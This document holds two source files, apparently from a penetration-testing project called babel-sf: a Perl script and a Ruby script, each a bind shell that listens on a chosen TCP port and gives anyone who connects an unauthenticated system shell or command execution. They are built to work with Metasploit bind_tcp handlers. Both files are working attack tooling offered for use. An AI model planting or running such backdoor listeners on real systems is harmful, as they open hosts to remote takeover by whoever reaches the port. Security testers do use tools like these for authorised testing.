File: perl/msf-bind_tcp.pl
#!/usr/bin/perl
#
# msf-bind_tcp.pl version 0.1
#
# babel-sf ( https://github.com/attackdebris/babel-sf )
#

use POSIX qw(strftime);
use Socket;

my $date = strftime "%m-%d-%Y %H:%M", localtime;
my $num_args = $#ARGV + 1;
if ($num_args == 0 or $ARGV[0] eq "-h" or $ARGV[0] eq "--help" or $ARGV[0] eq "--h" or $ARGV[0] eq "-help") {
	print"msf-bind_tcp.pl - ( https://github.com/attackdebris/babel-sf )\n";
	print"[This script should be utilised with a linux/x86/shell/bind_tcp msf handler]\n";
	print"\nUsage:"; 
        print"\nperl msf-bind_tcp.pl [port number]";
	print"\nperl msf-bind_tcp.pl e.g. perl msf-bind_tcp.pl 8080\n";
}
elsif ($num_args != 1) {
	print"Only 1 argument is required, please check your syntax.\n";
}	
elsif ($num_args == 1) {
	$port = $ARGV[0];
	print"Starting msf-bind_tcp.pl ( https://github.com/attackdebris/babel-sf ) at $date\n";
	print"Listening on TCP port $port....\n";
	socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
	setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1);
	bind (S, sockaddr_in ($port, INADDR_ANY));
	listen (S, 10);
     
	while (1){
	  accept (X, S);
	  if (!($pid = fork())){
	    if(!defined $pid){exit(0);}
	    open STDIN,"<&X";
	    open STDOUT,">&X";
	    open STDERR,">&X";
     	    exec("/bin/sh");
	    }
	 }
}

File: ruby/msf-bind_tcp.rb
#!/usr/bin/ruby
#
# msf-bind_tcp.rb version 0.1
#
# babel-sf ( https://github.com/attackdebris/babel-sf )
#

require 'socket'

port_number = ARGV[0]

time = Time.now.strftime("%Y-%m-%d %H:%M")

if ARGV.empty? or ARGV[0] == "-h" or ARGV[0] == "--h" or ARGV[0] == "-help" or ARGV[0] == "--help"
    puts "msf-bind_tcp.rb ( https://github.com/attackdebris/babel-sf )"
    puts "\r\n[This script should be utilised with a ruby/shell_bind_tcp msf handler payload]"
    puts "\r\n"
    puts "Usage:"
    puts "ruby msf-bind_tcp.rb [bind port]"
    puts "e.g. ruby msf-bind_tcp.rb 4444"
elsif ARGV.length != 1
    puts "msf-reverse_tcp.rb ( https://github.com/attackdebris/babel-sf )"
    puts "\r\nError, only 1 argument is required, check your syntax"
else
  puts "Starting msf-bind_tcp.rb ( https://github.com/attackdebris/babel-sf ) at #{time}"
  puts "Listening on TCP port #{port_number}...."
  s=TCPServer.new(port_number);
  c=s.accept;s.close;
  $stdin.reopen(c);
  $stdout.reopen(c);
  $stderr.reopen(c);
  $stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
end